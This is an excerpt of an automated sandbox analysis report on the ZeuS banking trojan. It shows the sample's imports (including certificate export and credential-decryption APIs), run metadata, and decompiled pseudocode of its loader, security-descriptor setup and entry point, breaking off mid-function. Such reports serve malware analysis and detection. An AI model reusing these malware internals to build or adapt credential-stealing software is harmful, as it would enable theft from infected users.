WS2_32.dll	WSASetLastError, freeaddrinfo, socket, bind, recv, setsockopt, shutdown, getsockname, getpeername, recvfrom, sendto, WSASend, WSAEventSelect, WSAIoctl, connect, WSAAddressToStringW, WSAStartup, getaddrinfo, select, closesocket, send, listen, accept, WSAGetLastError
CRYPT32.dll	PFXExportCertStoreEx, CertDuplicateCertificateContext, CertEnumCertificatesInStore, PFXImportCertStore, CertCloseStore, CertOpenSystemStoreW, CertDeleteCertificateFromStore, CryptUnprotectData
WININET.dll	HttpAddRequestHeadersW, InternetSetStatusCallbackW, GetUrlCacheEntryInfoW, HttpAddRequestHeadersA, HttpSendRequestW, InternetReadFileExA, InternetQueryDataAvailable, HttpSendRequestExW, HttpSendRequestExA, InternetQueryOptionA, InternetCloseHandle, InternetOpenA, HttpSendRequestA, HttpOpenRequestA, InternetSetOptionA, InternetReadFile, InternetCrackUrlA, InternetQueryOptionW, InternetConnectA, HttpQueryInfoA
OLEAUT32.dll	VariantInit, SysAllocString, VariantClear, SysFreeString
NETAPI32.dll	NetApiBufferFree, NetUserEnum, NetUserGetInfo

Network Behavior

No network behavior found

Code Manipulations

Statistics

CPU Usage

• ZeuS.exe

Click to jump to process

Memory Usage

• ZeuS.exe

Click to jump to process

System Behavior

Analysis Process: ZeuS.exe PID: 6624 Parent PID: 5644

Function Logs

General

Start time:	12:07:06
Start date:	08/02/2021
Path:	C:\Users\user\Desktop\ZeuS.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\ZeuS.exe'
Imagebase:	0x400000
File size:	141312 bytes
MD5 hash:	E77A6D08421977EE157A02F2E7590B99
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Show Windows behavior

File Activities

File Opened

Show Windows behavior

Section Activities

Process Activities

Process Terminated

Show Windows behavior

Thread Activities

Thread Information Set

Show Windows behavior

Memory Activities

Memory Allocated

Memory Usage Statistics

Show Windows behavior

System Activities

Show Windows behavior

LPC Port Activities

Chronological Activities

Disassembly

Code Analysis

Analysis Process: ZeuS.exe PID: 6624 Parent PID: 5644 ZeuS.exeCOMMON

Execution Graph

Execution Coverage

Dynamic/Packed Code Coverage

Signature Coverage

Execution Coverage:	0.7%
Dynamic/Decrypted Code Coverage:	1.3%
Signature Coverage:	17%
Total number of Nodes:	825
Total number of Limit Nodes:	5

Executed Functions

Function 0041C53B, Relevance: 40.5, APIs: 15, Strings: 8, Instructions: 227
libraryloadermemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 87%

			E0041C53B(signed char __ecx, void* __edx) {
				char _v481;
				char _v828;
				char _v1220;
				char _v1240;
				intOrPtr _v1248;
				intOrPtr _v1252;
				signed char _v1256;
				intOrPtr _v1260;
				signed char _v1264;
				struct HINSTANCE__* _v1268;
				intOrPtr _v1272;
				void* __edi;
				void* __esi;
				signed int _t43;
				struct HINSTANCE__* _t46;
				struct HINSTANCE__* _t50;
				_Unknown_base(*)()* _t56;
				void* _t57;
				signed int _t60;
				void** _t61;
				signed int _t65;
				signed int _t67;
				signed int _t68;
				signed int _t70;
				void* _t76;
				intOrPtr _t80;
				signed int _t81;
				signed int _t82;
				signed int _t83;
				struct HINSTANCE__* _t84;
				int _t86;
				signed int _t89;
				void* _t92;
				signed int* _t94;
				WCHAR* _t98;
				void* _t99;
				signed int* _t101;

				_t92 = __edx;
				_t90 = __ecx;
				_v1264 = __ecx;
				_t86 = 0;
				_t2 =  &_v1264;
				 *_t2 = _v1264 & 0x00000001;
				_v1256 = __ecx;
				if( *_t2 == 0) {
					 *0x4239b0 = 0;
				}
				_t94 = E0041C1F6();
				 *0x4239c8 = _t94;
				if(_t94 == _t86) {
					L26:
					_t43 = 0;
				} else {
					if(_v1264 != _t86) {
						_v1256 = E0041C130(_t90, _t92, _t94, "GetProcAddress");
						_v1256 = E0041C130(_t90, _t92, _t94, "LoadLibraryA");
						_t46 =  *0x4239c4;
						_v1268 = _t46;
						_t90 =  *((intOrPtr*)(_t46 + 0x3c)) + _t46 + 0x80;
						__eflags = _v1256 - _t86;
						if(_v1256 == _t86) {
							goto L20;
						} else {
							__eflags = _v1252 - _t86;
							if(_v1252 == _t86) {
								goto L20;
							} else {
								_t94 =  *_t90;
								__eflags = _t94 - _t86;
								if(_t94 <= _t86) {
									goto L20;
								} else {
									__eflags =  *((intOrPtr*)(_t90 + 4)) - 0x14;
									if( *((intOrPtr*)(_t90 + 4)) <= 0x14) {
										goto L20;
									} else {
										_t94 = _t94 + _t46;
										__eflags =  *_t94 - _t86;
										if( *_t94 == _t86) {
											goto L20;
										} else {
											while(1) {
												_t80 = _v1248(_t94[3] + _v1260);
												_v1248 = _t80;
												__eflags = _t80 - _t86;
												if(_t80 == _t86) {
													goto L26;
												}
												_t101 =  *_t94 + _v1264;
												_t89 = _t94[4] + _v1264;
												while(1) {
													_t81 =  *_t101;
													__eflags = _t81;
													if(__eflags == 0) {
														break;
													}
													if(__eflags >= 0) {
														_t90 = _v1264;
														_t82 = _t81 + _v1264 + 2;
													} else {
														_t82 = _t81 & 0x0000ffff;
													}
													_t83 = _v1256(_v1248, _t82);
													__eflags = _t83;
													if(_t83 == 0) {
														goto L26;
													} else {
														 *_t89 = _t83;
														_t101 =  &(_t101[1]);
														_t89 = _t89 + 4;
														__eflags = _t89;
														continue;
													}
													goto L46;
												}
												_t94 =  &(_t94[5]);
												_t86 = 0;
												__eflags =  *_t94;
												if( *_t94 != 0) {
													continue;
												} else {
													goto L20;
												}
												goto L46;
											}
											goto L26;
										}
									}
								}
							}
						}
					} else {
						_t84 = GetModuleHandleW(_t86);
						 *0x4239c4 = _t84;
						if(_t84 == _t86) {
							goto L26;
						} else {
							L20:
							_t98 =  &_v1240;
							E0040F34A(0xe5, _t98);
							_t50 = GetModuleHandleW(_t98);
							 *0x4239cc = _t50;
							if(_t50 == _t86) {
								goto L26;
							} else {
								_t99 = GetProcAddress;
								 *0x4239d0 = GetProcAddress(_t50, "NtCreateThread");
								 *0x4239d4 = GetProcAddress( *0x4239cc, "NtCreateUserProcess");
								 *0x4239d8 = GetProcAddress( *0x4239cc, "NtQueryInformationProcess");
								 *0x4239dc = GetProcAddress( *0x4239cc, "RtlUserThreadStart");
								 *0x4239e0 = GetProcAddress( *0x4239cc, "LdrLoadDll");
								_t56 = GetProcAddress( *0x4239cc, "LdrGetDllHandle");
								 *0x4239e4 = _t56;
								if( *0x4239d0 != _t86 ||  *0x4239d4 != _t86) {
									if( *0x4239d8 == _t86 ||  *0x4239e0 == _t86 || _t56 == _t86) {
										goto L26;
									} else {
										_t57 = HeapCreate(_t86, 0x80000, _t86); // executed
										 *0x4231a4 = _t57;
										__eflags = _t57 - _t86;
										if(_t57 != _t86) {
											 *0x4223b3 = 1;
										} else {
											 *0x4231a4 = GetProcessHeap();
											 *0x4223b3 = 0;
										}
										 *0x4227d8 = _t86;
										 *0x4223b2 = 0;
										InitializeCriticalSection(0x423870);
										 *0x423888 = _t86; // executed
										__imp__#115(0x202,  &_v1220); // executed
										_t60 = E0041C230(_v1264, _t90, _t94, _t99);
										__eflags = _t60;
										if(_t60 == 0) {
											goto L26;
										} else {
											__eflags = _v1272 - _t86;
											if(_v1272 != _t86) {
												L33:
												_t61 = E004067FD(_t90, 0xffffffff, 0x4239c0);
												 *0x4239b4 = _t61;
												__eflags = _t61 - _t86;
												if(_t61 == _t86) {
													goto L26;
												} else {
													 *0x4239b8 = GetLengthSid( *_t61);
													 *0x4239bc = E00406595( *( *0x4239b4), _t62);
													_t65 = E0041C2AF(_t64, _v1272);
													__eflags = _t65;
													if(_t65 == 0) {
														goto L26;
													} else {
														 *0x423c20 = GetCurrentProcessId();
														 *0x423c24 = _t86;
														__eflags = _v1272 - _t86;
														if(_v1272 != _t86) {
															_t67 = 1;
														} else {
															_t67 = E0041C311();
														}
														__eflags = _t67;
														if(_t67 == 0) {
															goto L26;
														} else {
															__eflags = _v1272 - _t86;
															if(_v1272 == _t86) {
																E0041CC1D( &_v828);
																_t90 = 0x423e1e;
																E0040983F(0x423e1e, 0x423c28,  *0x4239bc,  &_v481, _t86);
															}
															_t68 = E0041C363(_v1264);
															__eflags = _t68;
															if(_t68 == 0) {
																goto L26;
															} else {
																__eflags = _v1264 & 0x00000002;
																 *0x4231b4 = _t86;
																 *0x423460 = 0;
																 *0x4231d0 = 0;
																 *0x423fc8 = 0;
																 *0x423f60 = 0;
																 *0x423ef8 = 0;
																 *0x423e90 = 0;
																if(__eflags == 0) {
																	_t70 = 1;
																} else {
																	_t70 = E0041C41A(_t90, _t92, __eflags);
																}
																__eflags = _t70;
																_t41 = _t70 != 0;
																__eflags = _t41;
																_t43 = _t70 & 0xffffff00 | _t41;
															}
														}
													}
												}
											} else {
												_t76 = CreateEventW(0x4239e8, 1, _t86, _t86);
												 *0x423e78 =  *0x423e78 | 0xffffffff;
												 *0x423e74 = _t76;
												__eflags = _t76 - _t86;
												if(_t76 == _t86) {
													goto L26;
												} else {
													goto L33;
												}
											}
										}
									}
								} else {
									goto L26;
								}
							}
						}
					}
				}
				L46:
				return _t43;
			}

0x0041c53b
0x0041c53b
0x0041c548
0x0041c54d
0x0041c54f
0x0041c54f
0x0041c555
0x0041c559
0x0041c55b
0x0041c55b
0x0041c566
0x0041c568
0x0041c570
0x0041c6f7
0x0041c6f7
0x0041c576
0x0041c57a
0x0041c5a4
0x0041c5ad
0x0041c5b1
0x0041c5b9
0x0041c5bd
0x0041c5c4
0x0041c5c8
0x00000000
0x0041c5ca
0x0041c5ca
0x0041c5ce
0x00000000
0x0041c5d0
0x0041c5d0
0x0041c5d2
0x0041c5d4
0x00000000
0x0041c5d6
0x0041c5d6
0x0041c5da
0x00000000
0x0041c5dc
0x0041c5dc
0x0041c5de
0x0041c5e0
0x00000000
0x0041c5e2
0x0041c5e2
0x0041c5ea
0x0041c5ee
0x0041c5f2
0x0041c5f4
0x00000000
0x00000000
0x0041c5ff
0x0041c603
0x0041c633
0x0041c633
0x0041c635
0x0041c637
0x00000000
0x00000000
0x0041c609
0x0041c612
0x0041c616
0x0041c60b
0x0041c60b
0x0041c60b
0x0041c61f
0x0041c623
0x0041c625
0x00000000
0x0041c62b
0x0041c62b
0x0041c62d
0x0041c630
0x0041c630
0x00000000
0x0041c630
0x00000000
0x0041c625
0x0041c639
0x0041c63c
0x0041c63e
0x0041c640
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0041c640
0x00000000
0x0041c5e2
0x0041c5e0
0x0041c5da
0x0041c5d4
0x0041c5ce
0x0041c57c
0x0041c57d
0x0041c583
0x0041c58a
0x00000000
0x0041c590
0x0041c642
0x0041c642
0x0041c64b
0x0041c653
0x0041c659
0x0041c660
0x00000000
0x0041c666
0x0041c666
0x0041c67f
0x0041c691
0x0041c6a3
0x0041c6b5
0x0041c6c7
0x0041c6cc
0x0041c6ce
0x0041c6d9
0x0041c6e9
0x00000000
0x0041c6fe
0x0041c705
0x0041c70b
0x0041c710
0x0041c712
0x0041c728
0x0041c714
0x0041c71a
0x0041c71f
0x0041c71f
0x0041c734
0x0041c73a
0x0041c741
0x0041c751
0x0041c757
0x0041c761
0x0041c766
0x0041c768
0x00000000
0x0041c76a
0x0041c76a
0x0041c76e
0x0041c793
0x0041c79a
0x0041c79f
0x0041c7a4
0x0041c7a6
0x00000000
0x0041c7ac
0x0041c7b4
0x0041c7ca
0x0041c7cf
0x0041c7d4
0x0041c7d6
0x00000000
0x0041c7dc
0x0041c7e2
0x0041c7e7
0x0041c7ed
0x0041c7f1
0x0041c7fa
0x0041c7f3
0x0041c7f3
0x0041c7f3
0x0041c7fc
0x0041c7fe
0x00000000
0x0041c804
0x0041c804
0x0041c808
0x0041c811
0x0041c825
0x0041c834
0x0041c834
0x0041c83d
0x0041c842
0x0041c844
0x00000000
0x0041c84a
0x0041c84c
0x0041c851
0x0041c857
0x0041c85d
0x0041c863
0x0041c869
0x0041c86f
0x0041c875
0x0041c87b
0x0041c884
0x0041c87d
0x0041c87d
0x0041c87d
0x0041c886
0x0041c888
0x0041c888
0x0041c888
0x0041c888
0x0041c844
0x0041c7fe
0x0041c7d6
0x0041c770
0x0041c779
0x0041c77f
0x0041c786
0x0041c78b
0x0041c78d
0x00000000
0x00000000
0x00000000
0x00000000
0x0041c78d
0x0041c76e
0x0041c768
0x00000000
0x00000000
0x00000000
0x0041c6d9
0x0041c660
0x0041c58a
0x0041c57a
0x0041c88b
0x0041c891

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 0041C57D
GetModuleHandleW.KERNEL32(?,LoadLibraryA,GetProcAddress), ref: 0041C653
GetProcAddress.KERNEL32(00000000,NtCreateThread), ref: 0041C672
GetProcAddress.KERNEL32(NtCreateUserProcess), ref: 0041C684
GetProcAddress.KERNEL32(NtQueryInformationProcess), ref: 0041C696
GetProcAddress.KERNEL32(RtlUserThreadStart), ref: 0041C6A8
GetProcAddress.KERNEL32(LdrLoadDll), ref: 0041C6BA
GetProcAddress.KERNEL32(LdrGetDllHandle), ref: 0041C6CC
HeapCreate.KERNELBASE(00000000,00080000,00000000), ref: 0041C705
GetProcessHeap.KERNEL32 ref: 0041C714
InitializeCriticalSection.KERNEL32(00423870), ref: 0041C741
WSAStartup.WS2_32(00000202,?), ref: 0041C757
CreateEventW.KERNEL32(004239E8,00000001,00000000,00000000), ref: 0041C779
GetLengthSid.ADVAPI32(00000000,000000FF,004239C0), ref: 0041C7AE
GetCurrentProcessId.KERNEL32(?,?,00000000), ref: 0041C7DC

Strings

RtlUserThreadStart, xrefs: 0041C698
LdrGetDllHandle, xrefs: 0041C6BC
LoadLibraryA, xrefs: 0041C59F
NtQueryInformationProcess, xrefs: 0041C686
GetProcAddress, xrefs: 0041C595
NtCreateThread, xrefs: 0041C66C
NtCreateUserProcess, xrefs: 0041C674
LdrLoadDll, xrefs: 0041C6AA

Memory Dump Source

Source File: 00000000.00000002.209100921.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.209097188.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.209116683.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.209120393.0000000000425000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZeuS.jbxd

Similarity

API ID: AddressProc$CreateHandleHeapModuleProcess$CriticalCurrentEventInitializeLengthSectionStartup
String ID: GetProcAddress$LdrGetDllHandle$LdrLoadDll$LoadLibraryA$NtCreateThread$NtCreateUserProcess$NtQueryInformationProcess$RtlUserThreadStart
API String ID: 3091071419-305303173
Opcode ID: 608c3f0affc6f641294315a38c12ce926712a363d8bb0f0cb6ac6950368ce823
Instruction ID: b58e52cdb82bd401bb79be55b4580564e9b01dec325ab19b2c58fd0f232bc349
Opcode Fuzzy Hash: 608c3f0affc6f641294315a38c12ce926712a363d8bb0f0cb6ac6950368ce823
Instruction Fuzzy Hash: 10918DB0A443419FCB20AF64DDC56AA7BB0BB49306F50183FE545A3261D77D9986CF0E

Uniqueness

Uniqueness Score: -1.00%

Function 004087D5, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 57
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 79%

			E004087D5(struct _SECURITY_DESCRIPTOR* __edi, intOrPtr* __esi) {
				signed int _v8;
				struct _ACL* _v12;
				int _v16;
				int _v20;
				void** _t19;
				struct _SECURITY_DESCRIPTOR* _t28;
				intOrPtr* _t29;

				_t29 = __esi;
				_t28 = __edi;
				if(InitializeSecurityDescriptor(__edi, 1) == 0 || SetSecurityDescriptorDacl(__edi, 1, 0, 0) == 0) {
					return 0;
				} else {
					_t19 =  &_v8;
					__imp__ConvertStringSecurityDescriptorToSecurityDescriptorW(L"S:(ML;;NRNWNX;;;LW)", 1, _t19, 0); // executed
					if(_t19 == 0) {
						L6:
						_v8 = _v8 | 0xffffffff;
						L7:
						if(_t29 != 0) {
							 *_t29 = 0xc;
							 *(_t29 + 4) = _t28;
							 *((intOrPtr*)(_t29 + 8)) = 0;
						}
						return _v8;
					}
					_v12 = 0;
					if(GetSecurityDescriptorSacl(_v8,  &_v20,  &_v12,  &_v16) == 0 || SetSecurityDescriptorSacl(__edi, _v20, _v12, _v16) == 0) {
						LocalFree(_v8);
						goto L6;
					} else {
						goto L7;
					}
				}
			}

0x004087d5
0x004087d5
0x004087e7
0x00000000
0x004087fa
0x004087fb
0x00408806
0x0040880e
0x00408849
0x00408849
0x0040884d
0x0040884f
0x00408851
0x00408857
0x0040885a
0x0040885a
0x00000000
0x0040885d
0x0040881f
0x0040882a
0x00408843
0x00000000
0x00000000
0x00000000
0x00000000
0x0040882a

APIs

InitializeSecurityDescriptor.ADVAPI32(004239F4,00000001,?,0041C766), ref: 004087DF
SetSecurityDescriptorDacl.ADVAPI32(004239F4,00000001,00000000,00000000), ref: 004087F0
ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NRNWNX;;;LW),00000001,00000000,00000000), ref: 00408806
GetSecurityDescriptorSacl.ADVAPI32(00000000,?,00000001,?), ref: 00408822
SetSecurityDescriptorSacl.ADVAPI32(004239F4,?,00000001,?), ref: 00408836
LocalFree.KERNEL32(00000000), ref: 00408843

Strings

S:(ML;;NRNWNX;;;LW), xrefs: 00408801

Memory Dump Source

Source File: 00000000.00000002.209100921.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.209097188.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.209116683.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.209120393.0000000000425000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZeuS.jbxd

Similarity

API ID: DescriptorSecurity$Sacl$ConvertDaclFreeInitializeLocalString
String ID: S:(ML;;NRNWNX;;;LW)
API String ID: 2050860296-820036962
Opcode ID: e1bf71e0b886f02c4c75f81a3a1d31ea4edfe25e9a5fadab01403aa761a9b0fa
Instruction ID: 43bb6bc1dd1668e945618ef07835c5c1d6e75c3254577ced12ecb25565ed7e5c
Opcode Fuzzy Hash: e1bf71e0b886f02c4c75f81a3a1d31ea4edfe25e9a5fadab01403aa761a9b0fa
Instruction Fuzzy Hash: BE112472A00209FFEB11AFA18E85EAFBBBCAF04740F50447EF591F11A0DB759A409B14

Uniqueness

Uniqueness Score: -1.00%

Function 0041D470, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 83
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			_entry_(void* __edx, void* __eflags, void* __fp0) {
				char _v5;
				int _v12;
				char _v16;
				char _v20;
				void* _t22;
				void* _t28;
				char _t29;
				char _t33;
				signed int _t36;
				void* _t51;

				_t51 = __fp0;
				_t34 = 0;
				_t33 = 0; // executed
				_t22 = E0041C53B(0, __edx); // executed
				if(_t22 == 0) {
					L24:
					__eflags = _t33;
					_t21 = _t33 == 0;
					__eflags = _t21;
					ExitProcess(0 | _t21);
				}
				_v20 = 0;
				_v16 = 1;
				_v5 = 0;
				SetErrorMode(0x8007);
				_t28 = CommandLineToArgvW(GetCommandLineW(),  &_v12);
				if(_t28 == 0) {
					L19:
					_t29 = E0041D16A(_t34, __eflags, _t51, _v20, _v16);
					L20:
					_t33 = _t29;
					L21:
					if(_t33 == 0 || ( *0x4239b0 & 0x00000002) == 0) {
						goto L24;
					} else {
						Sleep(0xffffffff);
						return _t29;
					}
				}
				_t36 = 0;
				if(_v12 <= 0) {
					L14:
					LocalFree(_t28);
					_t48 = _t33;
					if(_t33 == 0) {
						__eflags = _v5;
						if(__eflags == 0) {
							goto L19;
						}
						E0040D74C(_t36);
						_t29 = E004179C2();
						__eflags =  *0x4239b0 & 0x00000004;
						_t33 = _t29;
						if(( *0x4239b0 & 0x00000004) != 0) {
							_t29 = E0040D5C5(0x423238, 0);
						}
						goto L21;
					}
					_t29 = E0041CF7B(_t48);
					goto L20;
				} else {
					goto L3;
				}
				do {
					L3:
					_t34 =  *(_t28 + _t36 * 4);
					if(_t34 != 0 &&  *_t34 == 0x2d) {
						_t34 =  *(_t34 + 2) & 0x0000ffff;
						if(_t34 == 0x66) {
							_v20 = 1;
						} else {
							if(_t34 == 0x69) {
								_t33 = 1;
							} else {
								if(_t34 == 0x6e) {
									_v16 = 0;
								} else {
									if(_t34 == 0x76) {
										_v5 = 1;
									}
								}
							}
						}
					}
					_t36 = _t36 + 1;
				} while (_t36 < _v12);
				goto L14;
			}

0x0041d470
0x0041d477
0x0041d479
0x0041d47b
0x0041d482
0x0041d55c
0x0041d55e
0x0041d560
0x0041d560
0x0041d564
0x0041d564
0x0041d48d
0x0041d490
0x0041d494
0x0041d497
0x0041d4a8
0x0041d4b0
0x0041d537
0x0041d53d
0x0041d542
0x0041d542
0x0041d544
0x0041d546
0x00000000
0x0041d551
0x0041d553
0x0041d55b
0x0041d55b
0x0041d546
0x0041d4b6
0x0041d4bb
0x0041d4fc
0x0041d4fd
0x0041d503
0x0041d505
0x0041d50e
0x0041d512
0x00000000
0x00000000
0x0041d514
0x0041d519
0x0041d51e
0x0041d525
0x0041d527
0x0041d530
0x0041d530
0x00000000
0x0041d527
0x0041d507
0x00000000
0x00000000
0x00000000
0x00000000
0x0041d4bd
0x0041d4bd
0x0041d4bd
0x0041d4c2
0x0041d4ca
0x0041d4d1
0x0041d4f2
0x0041d4d3
0x0041d4d6
0x0041d4ee
0x0041d4d8
0x0041d4db
0x0041d4e8
0x0041d4dd
0x0041d4e0
0x0041d4e2
0x0041d4e2
0x0041d4e0
0x0041d4db
0x0041d4d6
0x0041d4d1
0x0041d4f6
0x0041d4f7
0x00000000

APIs

Part of subcall function 0041C53B: GetModuleHandleW.KERNEL32(00000000), ref: 0041C57D
Part of subcall function 0041C53B: GetModuleHandleW.KERNEL32(?,LoadLibraryA,GetProcAddress), ref: 0041C653
Part of subcall function 0041C53B: GetProcAddress.KERNEL32(00000000,NtCreateThread), ref: 0041C672
Part of subcall function 0041C53B: GetProcAddress.KERNEL32(NtCreateUserProcess), ref: 0041C684
Part of subcall function 0041C53B: GetProcAddress.KERNEL32(NtQueryInformationProcess), ref: 0041C696
Part of subcall function 0041C53B: GetProcAddress.KERNEL32(RtlUserThreadStart), ref: 0041C6A8
Part of subcall function 0041C53B: GetProcAddress.KERNEL32(LdrLoadDll), ref: 0041C6BA
Part of subcall function 0041C53B: GetProcAddress.KERNEL32(LdrGetDllHandle), ref: 0041C6CC

SetErrorMode.KERNEL32(00008007), ref: 0041D497
GetCommandLineW.KERNEL32(?), ref: 0041D4A1
CommandLineToArgvW.SHELL32(00000000), ref: 0041D4A8
LocalFree.KERNEL32(00000000), ref: 0041D4FD
Sleep.KERNEL32(000000FF,?,00000001), ref: 0041D553
ExitProcess.KERNEL32 ref: 0041D564

Strings

82B, xrefs: 0041D52B

Memory Dump Source

Source File: 00000000.00000002.209100921.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.209097188.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.209116683.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.209120393.0000000000425000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZeuS.jbxd

Similarity

API ID: AddressProc$CommandHandleLineModule$ArgvErrorExitFreeLocalModeProcessSleep
String ID: 82B
API String ID: 1184560534-2694519287
Opcode ID: 2e2f242e093cacd0e8f96f74c3cc499f020e76e2bc3b12c98483432f52749cd1
Instruction ID: 8ad9bc9191da2c70f5093ce8fcf59ba3170b91a6cef4f3572feb8d2c514eebee
Opcode Fuzzy Hash: 2e2f242e093cacd0e8f96f74c3cc499f020e76e2bc3b12c98483432f52749cd1
Instruction Fuzzy Hash: 5D21F6F0D44280B6CF199BBC89187FF3BA26F02308F18419BE4416A2A2D77D65C9C71E

Uniqueness

Uniqueness Score: -1.00%

Function 00409789, Relevance: 10.6, APIs: 7, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 53%

			E00409789() {
				void* _t30;
				void* _t33;
				intOrPtr* _t35;
				void* _t36;
				void* _t39;
				void* _t41;

				_t39 = _t41 - 0x74;
				_t17 = _t39 - 0x260;
				 *((char*)(_t39 + 0x73)) = 0;
				__imp__SHGetFolderPathW(0, 0x24, 0, 0, _t17, _t33, _t36, _t30); // executed
				if(_t17 != 0) {
					L8:
					E00405299(_t17,  *((intOrPtr*)(_t39 + 0x7c)), 0, 0x10);
				} else {
					PathAddBackslashW(_t39 - 0x260);
					_t35 = __imp__GetVolumeNameForVolumeMountPointW;
					while(1) {
						_t17 =  *_t35(_t39 - 0x260, _t39 - 0x58, 0x64); // executed
						if(_t17 != 0) {
							break;
						}
						PathRemoveBackslashW(_t39 - 0x260);
						if(PathRemoveFileSpecW(_t39 - 0x260) == 0) {
							goto L8;
						} else {
							PathAddBackslashW(_t39 - 0x260);
							continue;
						}
						goto L9;
					}
					if( *((short*)(_t39 - 0x44)) != 0x7b) {
						goto L8;
					} else {
						 *((short*)(_t39 + 8)) = 0;
						_t17 = _t39 - 0x44;
						__imp__CLSIDFromString(_t17,  *((intOrPtr*)(_t39 + 0x7c)));
						if(_t17 != 0) {
							goto L8;
						} else {
							 *((char*)(_t39 + 0x73)) = 1;
						}
					}
				}
				L9:
				return  *((intOrPtr*)(_t39 + 0x73));
			}

0x0040978a
0x00409799
0x004097a5
0x004097a8
0x004097b0
0x00409827
0x0040982d
0x004097b2
0x004097bf
0x004097c1
0x004097f0
0x004097fd
0x00409801
0x00000000
0x00000000
0x004097d0
0x004097e5
0x00000000
0x004097e7
0x004097ee
0x00000000
0x004097ee
0x00000000
0x004097e5
0x00409808
0x00000000
0x0040980a
0x0040980f
0x00409813
0x00409817
0x0040981f
0x00000000
0x00409821
0x00409821
0x00409821
0x0040981f
0x00409808
0x00409832
0x0040983c

APIs

SHGetFolderPathW.SHELL32(00000000,00000024,00000000,00000000,?,00000000,74B04EE0,?), ref: 004097A8
PathAddBackslashW.SHLWAPI(?), ref: 004097BF
PathRemoveBackslashW.SHLWAPI(?), ref: 004097D0
PathRemoveFileSpecW.SHLWAPI(?), ref: 004097DD
PathAddBackslashW.SHLWAPI(?), ref: 004097EE
GetVolumeNameForVolumeMountPointW.KERNELBASE(?,?,00000064), ref: 004097FD
CLSIDFromString.OLE32(?,?), ref: 00409817

Memory Dump Source

Source File: 00000000.00000002.209100921.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.209097188.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.209116683.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.209120393.0000000000425000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZeuS.jbxd

Similarity

API ID: Path$Backslash$RemoveVolume$FileFolderFromMountNamePointSpecString
String ID:
API String ID: 613918483-0
Opcode ID: d1423d0448c120e1eae1545c5b3dd51aa8f7cd6c15aa39ff12daa3fcc1aee5ed
Instruction ID: b6f9700567c46511afd2d5ef890a02f06087d17cb85ad7f4e5f257f7c7c28547
Opcode Fuzzy Hash: d1423d0448c120e1eae1545c5b3dd51aa8f7cd6c15aa39ff12daa3fcc1aee5ed
Instruction Fuzzy Hash: 4911727290420CAADB20DFB1DC88EDB77ACAB05344F14447AA510F3261E635EE489B64

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0040E31C, Relevance: 82.6, APIs: 27, Strings: 20, Instructions: 389
libraryloaderwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 38%

			E0040E31C(WCHAR* _a4, char _a8, signed short _a12) {
				struct HINSTANCE__* _v12;
				struct HINSTANCE__* _v16;
				struct HINSTANCE__* _v20;
				_Unknown_base(*)()* _v24;
				void* _v28;
				void* _v32;
				struct HDC__* _v36;
				_Unknown_base(*)()* _v40;
				_Unknown_base(*)()* _v44;
				struct tagPOINT _v52;
				_Unknown_base(*)()* _v56;
				struct HINSTANCE__* _v60;
				_Unknown_base(*)()* _v64;
				_Unknown_base(*)()* _v68;
				_Unknown_base(*)()* _v72;
				_Unknown_base(*)()* _v76;
				_Unknown_base(*)()* _v80;
				_Unknown_base(*)()* _v84;
				_Unknown_base(*)()* _v88;
				struct HINSTANCE__* _v92;
				struct HINSTANCE__* _v96;
				struct HINSTANCE__* _v100;
				char _v104;
				_Unknown_base(*)()* _v108;
				intOrPtr _v112;
				char _v116;
				_Unknown_base(*)()* _v120;
				char _v148;
				signed int _v152;
				struct _ICONINFO _v172;
				char _v188;
				struct HINSTANCE__* _t169;
				_Unknown_base(*)()* _t176;
				struct HINSTANCE__* _t181;
				_Unknown_base(*)()* _t182;
				struct HINSTANCE__* _t183;
				_Unknown_base(*)()* _t191;
				struct HDC__* _t197;
				struct HICON__* _t199;
				signed int _t200;
				intOrPtr _t202;
				intOrPtr _t204;
				void* _t206;
				void* _t223;
				intOrPtr* _t224;
				void* _t239;
				void* _t248;
				unsigned int _t260;
				intOrPtr* _t262;
				signed short _t263;
				intOrPtr _t264;
				WCHAR** _t265;
				intOrPtr _t268;
				signed int _t269;
				signed int _t272;
				void* _t275;

				_v32 = 0;
				_v60 = 0;
				_v16 = 0;
				_v104 = 1;
				_v100 = 0;
				_v96 = 0;
				_v92 = 0;
				_t169 = LoadLibraryA("gdiplus.dll");
				_v20 = _t169;
				_v24 = GetProcAddress(_t169, "GdiplusStartup");
